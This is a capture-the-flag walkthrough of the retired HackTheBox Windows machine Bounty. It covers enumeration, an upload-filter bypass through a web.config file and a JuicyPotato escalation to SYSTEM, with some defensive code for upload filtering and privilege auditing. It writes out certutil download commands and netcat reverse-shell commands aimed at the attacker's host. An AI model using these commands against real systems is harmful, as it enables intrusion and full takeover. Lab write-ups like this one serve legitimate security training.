HTB Walkthrough: Bounty w/o Metasploit (retired)

Shraddha M.
May 18, 2021

Bounty is a retired box on HTB and is part of TJ Null's list of OSCP-like boxes.

Hostname: Bounty | Difficulty Level: Easy | Operating System: Windows

NMAP Scan

┌──(root💀kali)-[/home/kali/labs/HTB/Bounty]
└─# nmap -sC -sV -oA Bounty 10.10.10.93
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-03 11:17 EDT
Nmap scan report for 10.10.10.93
Host is up (0.024s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration

Running nikto to gather more information:

┌──(root💀kali)-[/home/kali/labs/HTB/Bounty]
└─# nikto -h 10.10.10.93
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.93
+ Target Hostname: 10.10.10.93
+ Target Port: 80
+ Start Time: 2021-05-03 11:20:07 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host

Using gobuster to find .aspx and .asp files:

┌──(root💀kali)-[/home/kali/labs/HTB/Bounty]
└─# sudo gobuster dir -t 50 --url http://10.10.10.93 --wordlist /usr/share/wordlists/dirb/big.txt -x aspx,asp
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.93
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: aspx,asp
[+] Timeout: 10s
===============================================================
2021/05/03 11:28:36 Starting gobuster in directory enumeration mode
===============================================================
/aspnet_client (Status: 301) [Size: 156] [--> http://10.10.10.93/aspnet_client/]
/transfer.aspx (Status: 200) [Size: 941]
/uploadedfiles (Status: 301) [Size: 156] [--> http://10.10.10.93/uploadedfiles/]

Exploitation

From the gobuster results, we can upload a file at http://10.10.10.93/transfer.aspx and then view (or execute) it at http://10.10.10.93/uploadedfiles/<filename>. As a test, I uploaded a PNG file and was able to view it successfully.

Let's use Burp Suite to find out which extensions are allowed, so that we can upload something that executes code.

┌──(root💀kali)-[/home/kali/labs/HTB/Bounty]
└─# cat extensions.txt
config
aspx
php
pl
js
html
sh
jsp
cgi
php7

Upload a file at http://10.10.10.93/transfer.aspx, capture the request in Burp Suite and send it to Intruder. We are going to automate requests with each of the extensions listed in 'extensions.txt' above. Go to Intruder > Positions and clear all the payload markers (§). Then replace your file's extension with §EXTENSION§, so that only the extension is marked as the payload position:

Content-Disposition: form-data; name="FileUpload1"; filename="1.§EXTENSION§"

Now load extensions.txt into Burp Suite: go to Intruder > Payloads > Payload Options [Simple list] > Load and select the extensions.txt file. Click 'Start attack' (verify the target in the 'Target' tab of Intruder before starting the attack).

Every request comes back with status 200, but the response for 'config' is 5 characters shorter than the rest: it says 'File Uploaded successfully.' whereas all the others say 'Invalid File. Please try again.'

Let's try RCE. A Google search for 'web.config rce file upload' turns up https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/. Let us test whether we can execute code remotely. I used this config file, which is an exact copy of Soroush's: https://github.com/ShraddhaMhatre/HTB/blob/main/Webshells/ASPX/test.config . Upload it on the 'transfer.aspx' page, then visit 'test.config' in the uploadedfiles folder; you should see '3' displayed, the output of the code embedded in the file.

Let us try to execute commands through web.config. A Google search for "execute whoami command web.config" turns up https://lonewolfzero.wordpress.com/2018/05/28/rce-by-uploading-a-web-config-asp/. Edit the web.config file to run 'whoami' and you will see the user 'merlin' displayed.

The web.config file that runs 'whoami' can be found here: https://github.com/ShraddhaMhatre/HTB/blob/main/Webshells/ASPX/whoami.config ; it is adapted from lonewolfzero's article.
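The filter behaviour observed above, as an added illustration that is not code from the box or from the author: a block-list check modelled on what transfer.aspx appears to do (every extension in extensions.txt is rejected except config, which is simply not on the list) beside an allow-list check that closes that gap. Both filters, their extension lists and the test file names are constructed for this example.

```python
"""Upload-name checks modelled on the transfer.aspx behaviour observed above.
The two filters, their lists and the test names are constructed for this
example; they are not the box's code."""
import os
import re

# Constructed block-list that reproduces the observed result: every extension
# in extensions.txt is rejected except "config", which is simply not listed.
BLOCKED_EXTENSIONS = {"aspx", "asp", "php", "pl", "js", "html", "sh", "jsp", "cgi", "php7"}

# Constructed allow-list for an upload feature that only needs images.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}


def blocklist_check(filename: str) -> bool:
    """Weak filter: reject only known-bad extensions. Anything absent from the
    list passes, which is how a web.config upload gets through."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in BLOCKED_EXTENSIONS


def allowlist_check(filename: str) -> bool:
    """Hardened filter: accept only an explicit set of harmless extensions and
    reject names with path components, multiple extensions, or trailing dots
    and spaces (Windows strips those, so "shell.aspx." is stored as shell.aspx)."""
    base = os.path.basename(filename)
    if base != filename or base in ("", ".", ".."):
        return False                      # client-supplied paths are never legitimate
    if base.lower() == "web.config":
        return False                      # IIS reads this name as live configuration
    if base != base.rstrip(". "):
        return False                      # trailing dot/space would be stripped on save
    parts = base.split(".")
    if len(parts) != 2:
        return False                      # exactly one extension: no "x.aspx.png"
    name, ext = parts
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", name):
        return False                      # conservative character set for the stem
    return ext.lower() in ALLOWED_EXTENSIONS
```

Even with the allow-list in place, uploads should be stored outside any directory where IIS has script handlers enabled; the extension check is only the first layer.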

We will upload and execute nc.exe to get a reverse shell. Replace the command in the web.config with each of the following in turn:
1) Find a temp folder:
Set cmd1 = objShell.Exec("cmd /c dir c:\windows\temp")
2) Upload nc.exe:
Set cmd1 = objShell.Exec("cmd /c certutil -urlcache -split -f http://<Kali IP>:8000/nc.exe c:\windows\temp\nc.exe")
You will get the response for this web.config as:

3) Verify that the file is present:
Set cmd1 = objShell.Exec("cmd /c dir c:\windows\temp")
4) Execute nc.exe:
Set cmd1 = objShell.Exec("cmd /c c:\windows\temp\nc.exe <Kali IP> 9877 -e cmd")

You will get a reverse shell at 'c:\Users\merlin\Desktop>'. The file is hidden, so use the 'dir /a' command. [Note: make it a habit to use 'ls -a' and 'dir /a'.]

Privilege Escalation

Checking privileges for a Potato attack:

c:\Users>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

SeImpersonatePrivilege is enabled, so the box is vulnerable to JuicyPotato. For more info, refer to: https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html
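An added audit check, not part of the original walkthrough, that parses the whoami /priv table above and reports which token-impersonation privileges are enabled, the condition the Potato family depends on; it is the kind of check a defender runs to decide which service accounts need hardening. The sample text is the output shown above; the function and variable names are this example's own.

```python
"""Parse `whoami /priv` output and flag enabled token-impersonation privileges.
SAMPLE is the output captured above; function and variable names are this
example's own."""

# Privileges that let a process impersonate or replace a token; holding one of
# them enabled is what the Potato family of techniques checks for.
TOKEN_PRIVILEGES = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_privileges(text: str) -> dict:
    """Return {privilege name: state}. Rows start after the '====' ruler line;
    names and states contain no spaces, so the description (everything in
    between) can be discarded without a column-width calculation."""
    privileges = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("="):
            in_table = True               # ruler line: data rows follow
            continue
        if not in_table or not line.strip():
            continue
        fields = line.split()
        if len(fields) < 2 or not fields[0].startswith("Se"):
            continue                      # not a privilege row
        privileges[fields[0]] = fields[-1]
    return privileges


def enabled_token_privileges(text: str) -> list:
    """Names of impersonation-class privileges whose state is Enabled."""
    privileges = parse_privileges(text)
    return sorted(name for name, state in privileges.items()
                  if name in TOKEN_PRIVILEGES and state == "Enabled")


def at_risk(text: str) -> bool:
    """True when the account holds at least one enabled token privilege."""
    return bool(enabled_token_privileges(text))
```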

To get a reverse shell with it, a Google search for "juicy potato reverse shell" leads to https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/juicypotato

Transfer JuicyPotato.exe from Kali to the target machine. Start a netcat listener on Kali (port 9876) and run the command below:
c:\Windows\Temp>JuicyPotato -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\windows\temp\nc.exe -e cmd.exe <Kali IP> 9876" -t *
JuicyPotato -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\windows\temp\nc.exe -e cmd.exe <Kali IP> 9876" -t *
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
...
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

You will get a reverse shell as SYSTEM, and with it the flag.
